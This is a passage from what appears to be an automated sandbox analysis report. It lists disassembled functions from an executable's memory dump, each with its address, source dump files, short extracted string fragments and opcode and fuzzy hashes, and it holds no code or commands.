                                • Opcode Fuzzy Hash: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                                • Instruction Fuzzy Hash: D071B66150C3C18BD315CF2AC46037BFFE19FA2315F18895DE4D64B282D7B9890AD762
                                Function 01000870 Relevance: 5.9, Strings: 4, Instructions: 861COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: +2/?$=79$BBSH$GZE^
                                • API String ID: 0-3392023846
                                • Opcode ID: 70d0e0bd4a7ea4985857ad4e2e712e53b4fb6411303dab3e45b785a156871413
                                • Instruction ID: d2fa65dc4911b68d30ff5a85d0474a3f9dc929b9ea925e90e05b3342d020a6c0
                                • Opcode Fuzzy Hash: 70d0e0bd4a7ea4985857ad4e2e712e53b4fb6411303dab3e45b785a156871413
                                • Instruction Fuzzy Hash: EE522270504B818FE736CF29C490766BBE2BF46314F148AACD4E68BB96CB35E406CB51
                                Function 00FEB210 Relevance: 5.5, Strings: 4, Instructions: 464COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: H{D}$TgXy$_o]a$=>?
                                • API String ID: 0-2004217480
                                • Opcode ID: b2dd2017d2e50f9b374b72ea0c0be4015341bf3001ad4337ba8dec8124ce8019
                                • Instruction ID: e64a403ef53913c78ea58a2feae280e5801129d0599d11e93d0512ab361dd0cd
                                • Opcode Fuzzy Hash: b2dd2017d2e50f9b374b72ea0c0be4015341bf3001ad4337ba8dec8124ce8019
                                • Instruction Fuzzy Hash: BB1267B1110B01CFD3348F26D8957A7BBF5FB45324F148A1DD4AA8BA94DB79A405CF81
                                Function 01007E20 Relevance: 5.5, Strings: 4, Instructions: 461COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: =:;8$=:;8$a{$kp
                                • API String ID: 0-2717198472
                                • Opcode ID: 884febfa95c81789f907202e2ba9be5facce58e2876e73348ae590eb50da8cac
                                • Instruction ID: 3151032e42d2202459176219fb0ffdcba49002086b52c90572fcfa70a3b809d8
                                • Opcode Fuzzy Hash: 884febfa95c81789f907202e2ba9be5facce58e2876e73348ae590eb50da8cac
                                • Instruction Fuzzy Hash: DEE1DFB5908344CFE320DF68D88176BBBE5FBD5304F24896DE5C98B295DB399805CB82
                                Function 011B247A Relevance: 5.4, Strings: 3, Instructions: 1675COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: %]?_$Fowc$caQG
                                • API String ID: 0-27560083
                                • Opcode ID: 32ef7f40863c1e24575b26b834335d3a4e217b85d7027e527e4913a17ca9bf7b
                                • Instruction ID: 1e71669d7566eed9493658b1bf04d5d3b2d2d9700d2134ff3f38bd83550dfd55
                                • Opcode Fuzzy Hash: 32ef7f40863c1e24575b26b834335d3a4e217b85d7027e527e4913a17ca9bf7b
                                • Instruction Fuzzy Hash: AEB207F360C200AFE304AE2DEC8567ABBE9EF94720F16493DE6C4C7744EA7558058697
                                Function 00FEAD00 Relevance: 5.4, Strings: 4, Instructions: 424COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: @A$lPLN$svfZ$IK
                                • API String ID: 0-1806543684
                                • Opcode ID: aa20b42695449c03cd0d8897042669c7e740f189d758afd14c990e9e056ce3d5
                                • Instruction ID: 4f7c909a409380516a7f8d967a1210b2d3942d4742a4864262b0671add876e81
                                • Opcode Fuzzy Hash: aa20b42695449c03cd0d8897042669c7e740f189d758afd14c990e9e056ce3d5
                                • Instruction Fuzzy Hash: F6C11A71A4C3D48BD3248F6594A136FBBE2ABC2720F18C92DE5E54B345D7798C099B82
                                Function 011A8551 Relevance: 5.4, Strings: 3, Instructions: 1658COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?Cw~$FtA$gSN
                                • API String ID: 0-4176348373
                                • Opcode ID: da3fd938b4edb4291a769dc6cf0f7d767ecbea763a410962385b12e2732e5ba5
                                • Instruction ID: c5f653913e100eac164cc73bab0d31f5aa8b42b8d8036ebf8637c2124b5782d0
                                • Opcode Fuzzy Hash: da3fd938b4edb4291a769dc6cf0f7d767ecbea763a410962385b12e2732e5ba5
                                • Instruction Fuzzy Hash: D5B227F3A0C2109FE3046E29EC8567ABBE9EF94720F16893DE6C4C7744EA3558058797
                                Function 011A3414 Relevance: 5.4, Strings: 3, Instructions: 1644COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: !iw}$$3}o$Xl|v
                                • API String ID: 0-3405713809
                                • Opcode ID: b070bca50722d27b6647101b483f867199db99d160b57d90fba085855d84bfd8
                                • Instruction ID: 87ea0c14cf8e95ed5fda6c990aa0b02405d9ac48be518f50eaaf5af3b9941551
                                • Opcode Fuzzy Hash: b070bca50722d27b6647101b483f867199db99d160b57d90fba085855d84bfd8
                                • Instruction Fuzzy Hash: 96B206F36082049FE304AE2DEC8563ABBE5EFD4720F1A853DE6C4C7744EA3599058697
                                Function 00FE4040 Relevance: 4.2, Strings: 3, Instructions: 428COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: )$)$IEND
                                • API String ID: 0-588110143
                                • Opcode ID: 7da207c4e27313d43a179f33002c46bcb5c99b216855bbfd06e3a22438e447b1
                                • Instruction ID: f787ec4fdbe8912002c6df856a64bd9f881aba421800f164aae720b560d84b59
                                • Opcode Fuzzy Hash: 7da207c4e27313d43a179f33002c46bcb5c99b216855bbfd06e3a22438e447b1
                                • Instruction Fuzzy Hash: FFF123B1A087819FE314DF29C85172ABBE0BB94314F14462DFA999B3C1D778F914DB82
                                Function 01005E90 Relevance: 4.0, Strings: 3, Instructions: 295COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: @J$KP$VD
                                • API String ID: 0-3841663987
                                • Opcode ID: d31271648f134aa28463dad8a95b549c02e33e0766ab1489fa56983b0778c4b0
                                • Instruction ID: 777e9583dfb0453a8b8a85ffe247504b583d2c70676cd715728422f728a9586d
                                • Opcode Fuzzy Hash: d31271648f134aa28463dad8a95b549c02e33e0766ab1489fa56983b0778c4b0
                                • Instruction Fuzzy Hash: 2F916572700741AFE720CF68D881BABBBB1FB95310F14462CE5999B781D379A416CB92
                                Function 00FEC02B Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: PQ$A_$IG
                                • API String ID: 0-2179527320
                                • Opcode ID: 646e0bbdf30a4ca834d5f0e5621fa230d7b6ee715e727bbacd2f5ed31694ecb6
                                • Instruction ID: c920bf53d62a75ba0359d4c44785d24cc34f78992a92c6665bae02acb8999c76
                                • Opcode Fuzzy Hash: 646e0bbdf30a4ca834d5f0e5621fa230d7b6ee715e727bbacd2f5ed31694ecb6
                                • Instruction Fuzzy Hash: 3B41BBB040C3818AC7148F22D84266BB7F1FF96768F249A1CF0D18B295E3398546DB8A
                                Function 0101F8D0 Relevance: 3.3, Strings: 2, Instructions: 813COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: cC$jC
                                • API String ID: 0-2055910567
                                • Opcode ID: 2f5ffac81f6c5cb231eab39a57ad10721b840949d7a657f3ddcad8b4f0697c8b
                                • Instruction ID: 16d02b66c707ab3eeb23599604d7e0a6be703ddd72c2b43255878f78f2f5b3ed
                                • Opcode Fuzzy Hash: 2f5ffac81f6c5cb231eab39a57ad10721b840949d7a657f3ddcad8b4f0697c8b
                                • Instruction Fuzzy Hash: D442F435F04215CFCB28CF68D8916AEB7F2FB89310F19857DC996A7785CA799901CB80
                                Function 0101C040 Relevance: 3.1, Strings: 2, Instructions: 624COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: f$
                                • API String ID: 2994545307-508322865
                                • Opcode ID: afd6dfc87e964f79b4fae006be30b1b278525bc886004e2c7031ef79e2d4b05d
                                • Instruction ID: fa2d8639d9e34c9fdca413496a9d7c0cf1ec6bd1d1035dd79ec3eedaef12c002
                                • Opcode Fuzzy Hash: afd6dfc87e964f79b4fae006be30b1b278525bc886004e2c7031ef79e2d4b05d
                                • Instruction Fuzzy Hash: FA12F47028C3419FE725CF28C980B6BBBE5BBC5314F248A6CE5D587299D739D841CB52
                                Function 011A0C70 Relevance: 3.0, Strings: 2, Instructions: 534COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: "H?[$t.
                                • API String ID: 0-606737313
                                • Opcode ID: 25fb422613440aeaaa2ac5de03446a64b922cbfc5220e5483746b1842943afa4
                                • Instruction ID: d1846a83860a432717b1f72ce6b1516ceeeed5cf501df225d7b6b8729bc9698c
                                • Opcode Fuzzy Hash: 25fb422613440aeaaa2ac5de03446a64b922cbfc5220e5483746b1842943afa4
                                • Instruction Fuzzy Hash: D1F1C3F360C6049FE3086E29DC8567AFBE5EB94720F1A893DE6C5C7340EA3598458787
                                Function 011AF002 Relevance: 2.8, Strings: 1, Instructions: 1543COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
